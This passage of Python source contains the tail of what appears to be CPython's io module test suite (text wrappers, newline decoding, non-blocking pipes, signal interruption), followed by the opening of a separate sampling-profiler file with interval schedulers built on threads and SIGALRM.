    txt.flush = lambda: None # break reference loop
def test_multi_close(self):
    """close() is idempotent; operations after close raise ValueError."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    for _ in range(3):
        txt.close()
    self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
    # The .buffer attribute is read-only; reassignment must fail.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    buf = self.BytesIO(self.testdata)
    with self.assertRaises((AttributeError, TypeError)):
        txt.buffer = buf
def test_read_nonbytes(self):
    """Issue #17106: a crash occurred when the underlying read() returned
    non-bytes; the C implementation must raise TypeError instead.

    Fix: the original defined the identical ``NonbytesStream`` class twice
    in a row -- the first definition was dead code, immediately shadowed by
    the second. The duplicate has been removed; behavior is unchanged.
    """
    class NonbytesStream(self.StringIO):
        read1 = self.StringIO.read
    t = self.TextIOWrapper(NonbytesStream('a'))
    with self.maybeRaises(TypeError):
        t.read(1)
    t = self.TextIOWrapper(NonbytesStream('a'))
    with self.maybeRaises(TypeError):
        t.readline()
    t = self.TextIOWrapper(NonbytesStream('a'))
    self.assertEqual(t.read(), u'a')
def test_illegal_decoder(self):
    """Issue #17106: a codec whose decoder returns a non-string must make
    TextIOWrapper raise TypeError (C impl) rather than crash.

    Fix: removed the unused ``_make_illegal_wrapper`` helper and the
    commented-out py3-style branch that was its only (dead) reference;
    the executed assertions are unchanged.
    """
    # Crash when decoder returns non-string
    with support.check_py3k_warnings():
        t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
                               encoding='quopri_codec')
    with self.maybeRaises(TypeError):
        t.read(1)
    with support.check_py3k_warnings():
        t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
                               encoding='quopri_codec')
    with self.maybeRaises(TypeError):
        t.readline()
    with support.check_py3k_warnings():
        t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
                               encoding='quopri_codec')
    with self.maybeRaises(TypeError):
        t.read()
class CTextIOWrapperTest(TextIOWrapperTest):
    """TextIOWrapper tests specific to the C (_io) implementation."""

    def test_initialization(self):
        # Invalid constructor arguments must raise and leave the wrapper
        # unusable (subsequent reads raise ValueError).
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(TypeError, t.__init__, b, newline=42)
        self.assertRaises(ValueError, t.read)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)
        # repr() of a never-initialized wrapper must not crash.
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        rawio = io.FileIO(support.TESTFN, "wb")
        b = self.BufferedWriter(rawio)
        t = self.TextIOWrapper(b, encoding="ascii")
        t.write("456def")
        t.x = t  # create a reference cycle
        wr = weakref.ref(t)
        del t
        support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
        for i in range(1000):
            b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t1 = self.TextIOWrapper(b1, encoding="ascii")
            b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t2 = self.TextIOWrapper(b2, encoding="ascii")
            # circular references
            t1.buddy = t2
            t2.buddy = t1
        support.gc_collect()

    # The C implementation raises in the "maybe" cases, so maybeRaises is
    # a plain assertRaises here (the Python variant overrides it as a no-op).
    maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
    """TextIOWrapper tests specific to the pure-Python (_pyio) implementation."""

    @contextlib.contextmanager
    def maybeRaises(self, *args, **kwds):
        # The Python implementation doesn't raise in the "maybe" cases,
        # so this is a no-op stand-in for assertRaises.
        yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
    """Tests for IncrementalNewlineDecoder (universal newline translation)."""

    def check_newline_decoding_utf8(self, decoder):
        # UTF-8 specific tests for a newline decoder
        def _check_decode(b, s, **kwargs):
            # We exercise getstate() / setstate() as well as decode()
            state = decoder.getstate()
            self.assertEqual(decoder.decode(b, **kwargs), s)
            decoder.setstate(state)
            self.assertEqual(decoder.decode(b, **kwargs), s)

        # A multi-byte char fed byte-by-byte yields nothing until complete.
        _check_decode(b'\xe8\xa2\x88', "\u8888")

        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")

        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")

        # A dangling partial char must fail when final=True.
        _check_decode(b'\xe8', "")
        self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)

        decoder.reset()
        # "\r" is held back until we know whether "\n" follows.
        _check_decode(b'\n', "\n")
        _check_decode(b'\r', "")
        _check_decode(b'', "\n", final=True)
        _check_decode(b'\r', "\n", final=True)

        _check_decode(b'\r', "")
        _check_decode(b'a', "\na")

        _check_decode(b'\r\r\n', "\n\n")
        _check_decode(b'\r', "")
        _check_decode(b'\r', "\n")
        _check_decode(b'\na', "\na")

        _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
        _check_decode(b'\xe8\xa2\x88', "\u8888")
        _check_decode(b'\n', "\n")
        _check_decode(b'\xe8\xa2\x88\r', "\u8888")
        _check_decode(b'\n', "\n")

    def check_newline_decoding(self, decoder, encoding):
        # Feed input piecewise and verify the .newlines attribute grows
        # monotonically as each newline style is first seen.
        result = []
        if encoding is not None:
            encoder = codecs.getincrementalencoder(encoding)()
            def _decode_bytewise(s):
                # Decode one byte at a time
                for b in encoder.encode(s):
                    result.append(decoder.decode(b))
        else:
            encoder = None
            def _decode_bytewise(s):
                # Decode one char at a time
                for c in s:
                    result.append(decoder.decode(c))
        self.assertEqual(decoder.newlines, None)
        _decode_bytewise("abc\n\r")
        self.assertEqual(decoder.newlines, '\n')
        _decode_bytewise("\nabc")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc")
        self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
        decoder.reset()
        input = "abc"
        if encoder is not None:
            encoder.reset()
            input = encoder.encode(input)
        self.assertEqual(decoder.decode(input), "abc")
        self.assertEqual(decoder.newlines, None)

    def test_newline_decoder(self):
        encodings = (
            # None meaning the IncrementalNewlineDecoder takes unicode input
            # rather than bytes input
            None, 'utf-8', 'latin-1',
            'utf-16', 'utf-16-le', 'utf-16-be',
            'utf-32', 'utf-32-le', 'utf-32-be',
        )
        for enc in encodings:
            decoder = enc and codecs.getincrementaldecoder(enc)()
            decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
            self.check_newline_decoding(decoder, enc)
        decoder = codecs.getincrementaldecoder("utf-8")()
        decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
        self.check_newline_decoding_utf8(decoder)

    def test_newline_bytes(self):
        # Issue 5433: Excessive optimization in IncrementalNewlineDecoder
        # Chars that merely *contain* CR/LF byte values must pass through.
        def _check(dec):
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0D00"), "\u0D00")
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0A00"), "\u0A00")
            self.assertEqual(dec.newlines, None)
        dec = self.IncrementalNewlineDecoder(None, translate=False)
        _check(dec)
        dec = self.IncrementalNewlineDecoder(None, translate=True)
        _check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Runs the shared tests against the C implementation (namespace is
    # injected by test_main()).
    pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Runs the shared tests against the pure-Python implementation.
    pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
    """Miscellaneous tests of the io module's public surface (both impls)."""

    def tearDown(self):
        support.unlink(support.TESTFN)

    def test___all__(self):
        # Every name in io.__all__ must exist and be either an exception
        # type, an IOBase subclass, or a SEEK_* constant.
        for name in self.io.__all__:
            obj = getattr(self.io, name, None)
            self.assertIsNotNone(obj, name)
            if name == "open":
                continue
            elif "error" in name.lower() or name == "UnsupportedOperation":
                self.assertTrue(issubclass(obj, Exception), name)
            elif not name.startswith("SEEK_"):
                self.assertTrue(issubclass(obj, self.IOBase))

    def test_attributes(self):
        # mode/name attributes are exposed at every layer of the stack.
        f = self.open(support.TESTFN, "wb", buffering=0)
        self.assertEqual(f.mode, "wb")
        f.close()

        f = self.open(support.TESTFN, "U")
        self.assertEqual(f.name, support.TESTFN)
        self.assertEqual(f.buffer.name, support.TESTFN)
        self.assertEqual(f.buffer.raw.name, support.TESTFN)
        self.assertEqual(f.mode, "U")
        self.assertEqual(f.buffer.mode, "rb")
        self.assertEqual(f.buffer.raw.mode, "rb")
        f.close()

        f = self.open(support.TESTFN, "w+")
        self.assertEqual(f.mode, "w+")
        self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
        self.assertEqual(f.buffer.raw.mode, "rb+")

        g = self.open(f.fileno(), "wb", closefd=False)
        self.assertEqual(g.mode, "wb")
        self.assertEqual(g.raw.mode, "wb")
        # Opened from an fd, so .name is the fd number.
        self.assertEqual(g.name, f.fileno())
        self.assertEqual(g.raw.name, f.fileno())
        f.close()
        g.close()

    def test_io_after_close(self):
        # Every operation on a closed file must raise ValueError, for all
        # combinations of mode and buffering.
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "w", "buffering": 1},
                {"mode": "w", "buffering": 2},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "r", "buffering": 1},
                {"mode": "r", "buffering": 2},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+", "buffering": 1},
                {"mode": "w+", "buffering": 2},
                {"mode": "w+b", "buffering": 0},
            ]:
            f = self.open(support.TESTFN, **kwargs)
            f.close()
            self.assertRaises(ValueError, f.flush)
            self.assertRaises(ValueError, f.fileno)
            self.assertRaises(ValueError, f.isatty)
            self.assertRaises(ValueError, f.__iter__)
            if hasattr(f, "peek"):
                self.assertRaises(ValueError, f.peek, 1)
            self.assertRaises(ValueError, f.read)
            if hasattr(f, "read1"):
                self.assertRaises(ValueError, f.read1, 1024)
            if hasattr(f, "readall"):
                self.assertRaises(ValueError, f.readall)
            if hasattr(f, "readinto"):
                self.assertRaises(ValueError, f.readinto, bytearray(1024))
            self.assertRaises(ValueError, f.readline)
            self.assertRaises(ValueError, f.readlines)
            self.assertRaises(ValueError, f.seek, 0)
            self.assertRaises(ValueError, f.tell)
            self.assertRaises(ValueError, f.truncate)
            self.assertRaises(ValueError, f.write,
                              b"" if "b" in kwargs['mode'] else "")
            self.assertRaises(ValueError, f.writelines, [])
            self.assertRaises(ValueError, next, f)

    def test_blockingioerror(self):
        # Various BlockingIOError issues
        self.assertRaises(TypeError, self.BlockingIOError)
        self.assertRaises(TypeError, self.BlockingIOError, 1)
        self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
        self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
        b = self.BlockingIOError(1, "")
        self.assertEqual(b.characters_written, 0)
        # A reference cycle through the exception must still be collectable.
        class C(unicode):
            pass
        c = C("")
        b = self.BlockingIOError(1, c)
        c.b = b
        b.c = c
        wr = weakref.ref(c)
        del c, b
        support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_abcs(self):
        # Test the visible base classes are ABCs.
        self.assertIsInstance(self.IOBase, abc.ABCMeta)
        self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
        self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
        self.assertIsInstance(self.TextIOBase, abc.ABCMeta)

    def _check_abc_inheritance(self, abcmodule):
        # Each concrete object registers against exactly one of the
        # Raw/Buffered/Text ABCs, depending on how it was opened.
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "wb") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "w") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertIsInstance(f, abcmodule.TextIOBase)

    def test_abc_inheritance(self):
        # Test implementations inherit from their respective ABCs
        self._check_abc_inheritance(self)

    def test_abc_inheritance_official(self):
        # Test implementations inherit from the official ABCs of the
        # baseline "io" module.
        self._check_abc_inheritance(io)

    @unittest.skipUnless(fcntl, 'fcntl required for this test')
    def test_nonblock_pipe_write_bigbuf(self):
        self._test_nonblock_pipe_write(16*1024)

    @unittest.skipUnless(fcntl, 'fcntl required for this test')
    def test_nonblock_pipe_write_smallbuf(self):
        self._test_nonblock_pipe_write(1024)

    def _set_non_blocking(self, fd):
        # Switch the descriptor to O_NONBLOCK mode.
        flags = fcntl.fcntl(fd, fcntl.F_GETFL)
        self.assertNotEqual(flags, -1)
        res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
        self.assertEqual(res, 0)

    def _test_nonblock_pipe_write(self, bufsize):
        """Write through a non-blocking pipe until it blocks, draining on
        BlockingIOError, and verify nothing was lost or duplicated."""
        sent = []
        received = []
        r, w = os.pipe()
        self._set_non_blocking(r)
        self._set_non_blocking(w)

        # To exercise all code paths in the C implementation we need
        # to play with buffer sizes. For instance, if we choose a
        # buffer size less than or equal to _PIPE_BUF (4096 on Linux)
        # then we will never get a partial write of the buffer.
        rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
        wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)

        with rf, wf:
            for N in 9999, 73, 7574:
                try:
                    i = 0
                    while True:
                        msg = bytes([i % 26 + 97]) * N
                        sent.append(msg)
                        wf.write(msg)
                        i += 1
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    # Trim the unwritten tail of the last message.
                    sent[-1] = sent[-1][:e.characters_written]
                    received.append(rf.read())

            msg = b'BLOCKED'
            wf.write(msg)
            sent.append(msg)

            while True:
                try:
                    wf.flush()
                    break
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.characters_written, 0)
                    received.append(rf.read())

            # Drain the pipe; non-blocking read returns None when empty.
            received += iter(rf.read, None)

        sent, received = b''.join(sent), b''.join(received)
        self.assertEqual(sent, received)
        self.assertTrue(wf.closed)
        self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
    # Run MiscIOTest against the C implementation.
    io = io
    # Error text expected if the module is used during interpreter shutdown.
    shutdown_error = "RuntimeError: could not find io module state"
class PyMiscIOTest(MiscIOTest):
    # Run MiscIOTest against the pure-Python implementation.
    io = pyio
    # Error text expected if the module is used during interpreter shutdown.
    shutdown_error = "LookupError: unknown encoding: ascii"
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
    """Interactions between buffered I/O and POSIX signals (EINTR, partial
    writes, reentrancy)."""

    def setUp(self):
        self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)

    def tearDown(self):
        signal.signal(signal.SIGALRM, self.oldalrm)

    def alarm_interrupt(self, sig, frame):
        # Raise ZeroDivisionError from inside the signal handler.
        1 // 0

    @unittest.skipUnless(threading, 'Threading required for this test.')
    @unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
                     'issue #12429: skip test on FreeBSD <= 7')
    def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
        """Check that a partial write, when it gets interrupted, properly
        invokes the signal handler, and bubbles up the exception raised
        in the latter."""
        read_results = []
        def _read():
            s = os.read(r, 1)
            read_results.append(s)
        t = threading.Thread(target=_read)
        t.daemon = True
        r, w = os.pipe()
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            t.start()
            signal.alarm(1)
            # Fill the pipe enough that the write will be blocking.
            # It will be interrupted by the timer armed above. Since the
            # other thread has read one byte, the low-level write will
            # return with a successful (partial) result rather than an EINTR.
            # The buffered IO layer must check for pending signal
            # handlers, which in this case will invoke alarm_interrupt().
            try:
                with self.assertRaises(ZeroDivisionError):
                    wio.write(item * (support.PIPE_MAX_SIZE // len(item) + 1))
            finally:
                t.join()
            # We got one byte, get another one and check that it isn't a
            # repeat of the first one.
            read_results.append(os.read(r, 1))
            self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
        finally:
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and block again.
            try:
                wio.close()
            except IOError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_unbuffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)

    def test_interrupted_write_buffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb")

    def test_interrupted_write_text(self):
        self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")

    def check_reentrant_write(self, data, **fdopen_kwargs):
        def on_alarm(*args):
            # Will be called reentrantly from the same thread
            wio.write(data)
            1//0
        signal.signal(signal.SIGALRM, on_alarm)
        r, w = os.pipe()
        wio = self.io.open(w, **fdopen_kwargs)
        try:
            signal.alarm(1)
            # Either the reentrant call to wio.write() fails with RuntimeError,
            # or the signal handler raises ZeroDivisionError.
            with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
                while 1:
                    for i in range(100):
                        wio.write(data)
                        wio.flush()
                    # Make sure the buffer doesn't fill up and block further writes
                    os.read(r, len(data) * 100)
            exc = cm.exception
            if isinstance(exc, RuntimeError):
                self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
        finally:
            wio.close()
            os.close(r)

    def test_reentrant_write_buffered(self):
        self.check_reentrant_write(b"xy", mode="wb")

    def test_reentrant_write_text(self):
        self.check_reentrant_write("xy", mode="w", encoding="ascii")

    def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
        """Check that a buffered read, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        def alarm_handler(sig, frame):
            os.write(w, b"bar")
        signal.signal(signal.SIGALRM, alarm_handler)
        try:
            rio = self.io.open(r, **fdopen_kwargs)
            os.write(w, b"foo")
            signal.alarm(1)
            # Expected behaviour:
            # - first raw read() returns partial b"foo"
            # - second raw read() returns EINTR
            # - third raw read() returns b"bar"
            self.assertEqual(decode(rio.read(6)), "foobar")
        finally:
            rio.close()
            os.close(w)
            os.close(r)

    def test_interrupterd_read_retry_buffered(self):
        self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
                                          mode="rb")

    def test_interrupterd_read_retry_text(self):
        self.check_interrupted_read_retry(lambda x: x,
                                          mode="r")

    @unittest.skipUnless(threading, 'Threading required for this test.')
    def check_interrupted_write_retry(self, item, **fdopen_kwargs):
        """Check that a buffered write, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        select = support.import_module("select")
        # A quantity that exceeds the buffer size of an anonymous pipe's
        # write end.
        N = support.PIPE_MAX_SIZE
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        # We need a separate thread to read from the pipe and allow the
        # write() to finish. This thread is started after the SIGALRM is
        # received (forcing a first EINTR in write()).
        read_results = []
        write_finished = False
        error = [None]
        def _read():
            try:
                while not write_finished:
                    while r in select.select([r], [], [], 1.0)[0]:
                        s = os.read(r, 1024)
                        read_results.append(s)
            except BaseException as exc:
                error[0] = exc
        t = threading.Thread(target=_read)
        t.daemon = True
        def alarm1(sig, frame):
            # First alarm: re-arm for a second interrupt.
            signal.signal(signal.SIGALRM, alarm2)
            signal.alarm(1)
        def alarm2(sig, frame):
            # Second alarm: start draining the pipe so write() can finish.
            t.start()
        signal.signal(signal.SIGALRM, alarm1)
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            signal.alarm(1)
            # Expected behaviour:
            # - first raw write() is partial (because of the limited pipe buffer
            #   and the first alarm)
            # - second raw write() returns EINTR (because of the second alarm)
            # - subsequent write()s are successful (either partial or complete)
            self.assertEqual(N, wio.write(item * N))
            wio.flush()
            write_finished = True
            t.join()
            self.assertIsNone(error[0])
            self.assertEqual(N, sum(len(x) for x in read_results))
        finally:
            write_finished = True
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and could block (in case of failure).
            try:
                wio.close()
            except IOError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupterd_write_retry_buffered(self):
        self.check_interrupted_write_retry(b"x", mode="wb")

    def test_interrupterd_write_retry_text(self):
        self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
    # Run SignalsTest against the C implementation.
    io = io
class PySignalsTest(SignalsTest):
    # Run SignalsTest against the pure-Python implementation.
    io = pyio

    # Handling reentrancy issues would slow down _pyio even more, so the
    # tests are disabled.
    test_reentrant_write_buffered = None
    test_reentrant_write_text = None
def test_main():
    """Inject the C/Python io namespaces and mocks into each test class
    (C* classes get the _io names, Py* classes the _pyio names), then run."""
    tests = (CIOTest, PyIOTest,
             CBufferedReaderTest, PyBufferedReaderTest,
             CBufferedWriterTest, PyBufferedWriterTest,
             CBufferedRWPairTest, PyBufferedRWPairTest,
             CBufferedRandomTest, PyBufferedRandomTest,
             StatefulIncrementalDecoderTest,
             CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
             CTextIOWrapperTest, PyTextIOWrapperTest,
             CMiscIOTest, PyMiscIOTest,
             CSignalsTest, PySignalsTest,
             )

    # Put the namespaces of the IO module we are testing and some useful mock
    # classes in the __dict__ of each test.
    mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
             MockNonBlockWriterIO, MockRawIOWithoutRead)
    all_members = io.__all__ + ["IncrementalNewlineDecoder"]
    c_io_ns = dict((name, getattr(io, name)) for name in all_members)
    py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
    globs = globals()
    c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
    py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
    # Avoid turning open into a bound method.
    py_io_ns["open"] = pyio.OpenWrapper
    for test in tests:
        if test.__name__.startswith("C"):
            for name, obj in c_io_ns.items():
                setattr(test, name, obj)
        elif test.__name__.startswith("Py"):
            for name, obj in py_io_ns.items():
                setattr(test, name, obj)
    support.run_unittest(*tests)
# Allow running this test file directly.
if __name__ == "__main__":
    test_main()
|
newprofiler.py | # Python Profiler v3
# Copyright (c) 2015-2017 David R Walker
# TODO:
# [x] Record only functions in StackLines
# [ ] Handle per-line hotspots as separate structure (not nested) - ?
# [ ] Handle timeline as separate structure
# [x] Use unique stack IDs to dedupe stack tuples
# [ ] Merge profile data method
# [ ] add custom metadata values to profile data (e.g. url, op, user id) for filtering / grouping
# [ ] filter/merge profile data by metadata
# [x] Expose randomize parameter for stochastic sampling
# [x] Add rate control (remove interval)
# - is this more or less misleading if we don't adjust for profiler overhead to achieve rate?
# - not adjusting for drift might be handy for estimating profiler performance/overheads
# [x] Finish linux platform driver (get thread CPU times seems to be unfinished!!)
# [ ] Windows platform driver
# [ ] Tidy up platform drivers and make a nice platform choosing function
# [ ] Convert into proper Python module + split into submodules
# [ ] Basic (temp) dump function (flat) - replace with proper collated version from stack tree
# [ ] Filter out long tail option (collate items with low ticks as 'Other') to remove noise
# [ ] Post process to build stack/call graph (have exporters work from this graph instead of raw data) - ?
# [ ] Record process ID in addition to thread?
# [ ] Option to merge processes
# [ ] Option to merge threads
# [ ] Test performance / optimize on various platforms
# [ ] Serialize (+append?) to file (lock file?)
# [ ] Load from file
# [ ] HTML5 exporter with drill-down
# [ ] Import/exporter framework
# [ ] Export to standard profiler formats (e.g. python, callgrind, firefox ThreadProfile json)
# [ ] Make Python 3 compatible
# [ ] Decorator to wrap a function with profiler
# [ ] Function to watch a function in profiler? (e.g. store code object in dict and check)
# [ ] Option to filter out standard (and custom) libraries? (path prefixes?)
# [ ] Figure out how to play nicely with time.sleep(), etc. - do we need to patch it?
# - EINTR / silent signal interrupts
# - breaks sleep/timeout behaviour in programs - provide optional monkey patches?
# - or just accept that signals break waits, and is fixed eventually by PEP475
# ('serious' code should be handling EINTR anyway?)
# [ ] Figure out how to avoid having to patch thread, wherever possible
# - maybe spawn a test thread on module import to detect if thread IDs match ?
# [x] Make interval private on profiler (or don't store)
# [x] Move all running time stats etc. into _profile_data - already done
import os
import time
import random
from contextlib import contextmanager
# - Scheduler ------------------------------------------------------------------
# Base class for repeated periodic function call
# Base class for repeated periodic function call
class IntervalScheduler(object):
    """Invoke a callback approximately every `interval` seconds.

    Sub-classes supply the actual timing mechanism (thread, signal timer,
    ...) by overriding _init/_start/_stop and arranging for tick() to be
    called each period. If the mechanism interrupted a Python frame, it
    should pass that frame to tick(); otherwise it passes None.

    Fix: `func_kwargs` previously defaulted to a shared mutable ``{}``
    (classic mutable-default bug); it now defaults to None and is copied,
    so instances can never alias or mutate a caller's dict. Passing a dict
    explicitly still works exactly as before.
    """

    # Suggested ticks/second for this mechanism; overridden by sub-classes.
    default_rate = 1

    def __init__(self, interval_func, interval=0.01, stochastic=False,
                 func_args=(), func_kwargs=None):
        self.interval = interval
        self._random = None
        if stochastic:
            # Our own Random to avoid side effects on the shared global PRNG.
            self._random = random.Random()
        self._running = False
        self._interval_func = interval_func
        self._func_args = func_args
        # Defensive copy; None (the default) means "no extra kwargs".
        self._func_kwargs = dict(func_kwargs) if func_kwargs else {}
        self._init()

    def start(self):
        """Start ticking; no-op if already running."""
        if not self.is_running():
            self._start()
            self._running = True

    def stop(self):
        """Stop ticking; no-op if not running."""
        if self.is_running():
            self._stop()
            self._running = False

    def is_running(self):
        return self._running

    def get_next_interval(self):
        """Return the delay before the next tick.

        In stochastic mode this is uniform on [0, 2*interval), whose mean
        equals `interval` (randomized sampling avoids aliasing with
        periodic application activity).
        """
        if self._random:
            return (2.0 * self._random.random() * self.interval)
        else:
            return self.interval

    def tick(self, frame):
        """Deliver one sample: call the callback with the interrupted frame
        (or None) passed as the `_interrupted_frame` keyword."""
        self._interval_func(*self._func_args, _interrupted_frame=frame,
                            **self._func_kwargs)

    # Sub-classes should override the following methods to implement a
    # scheduler that will call self.tick() every self.interval seconds.
    # If the scheduler interrupts a Python frame, it should pass the frame
    # that was interrupted to tick(), otherwise it should pass in None.
    def _init(self):
        pass

    def _start(self):
        raise NotImplementedError()

    def _stop(self):
        raise NotImplementedError()
# Uses a separate sleeping thread, which wakes periodically and calls self.tick()
class ThreadIntervalScheduler(IntervalScheduler):
    """Scheduler driven by a daemon thread that sleeps between ticks.

    tick() is always called with frame=None because a worker thread never
    interrupts another thread's frame.
    """
    default_rate = 100
    def _init(self):
        import threading
        self._thread = None
        # NOTE(review): _stopping is written here and in _stop() but never
        # read anywhere in this class -- looks vestigial; confirm before removing.
        self._stopping = False
        self._event = threading.Event()
    def _start(self):
        import threading
        def thread_func():
            # Note: if the event is set while wait() is blocking, one final
            # tick still fires before the loop condition is re-checked.
            while not self._event.is_set():
                self._event.wait(timeout=self.get_next_interval())
                self.tick(None)
        self._event.clear()
        self._thread = threading.Thread(target=thread_func, name='profiler')
        self._thread.daemon = True  # don't keep the process alive on exit
        self._thread.start()
    def _stop(self):
        # Wake the worker (ends its loop) and wait for it to exit.
        self._event.set()
        self._thread.join()
        self._stopping = False
import signal
# Signals the main thread every interval, which calls the tick() method when
# the timer event is triggered.
# Note that signal handlers are blocked during system calls, library calls, etc.
# in the main thread.
# We compensate for this by keeping track of real, user cpu, and system cpu
# usage between ticks on each thread.
# We prefer ITIMER_REAL, because that will be triggered immediately upon
# returning from a long-blocking system call, so we can add the ticks to the
# most appropriate function.
# However, if the main thread is blocked for a significant period, this will
# reduce the accuracy of samples in other threads, because only the main
# thread handles signals. In such situations, the ThreadIntervalScheduler might
# be more accurate.
# We don't specify an interval and reschedule the next tick ourselves. This
# allows us to dynamically change the sample interval to avoid aliasing, and
# prevents the signal interrupting itself, which can lead to stack errors,
# some strange behaviour when threads are being join()ed, and polluting the
# profile data with stack data from the profiler.
class SignalIntervalScheduler(IntervalScheduler):
    """Schedules ticks by delivering SIGALRM (via ITIMER_REAL) to the main
    thread; the handler receives the interrupted frame and re-arms a one-shot
    timer itself so the signal cannot interrupt its own handler.
    """
    default_rate = 1000
    timer = signal.ITIMER_REAL
    signal = signal.SIGALRM

    def _init(self):
        # Bug fix: initialise the run flag here so that _stop() is safe even
        # if _start() was never called (previously raised AttributeError).
        self._run = False

    def _start(self):
        def signal_handler(signum, frame):
            self.tick(frame)
            # Re-arm the one-shot timer ourselves; this also lets the
            # interval vary per-tick (stochastic mode).
            if self._run:
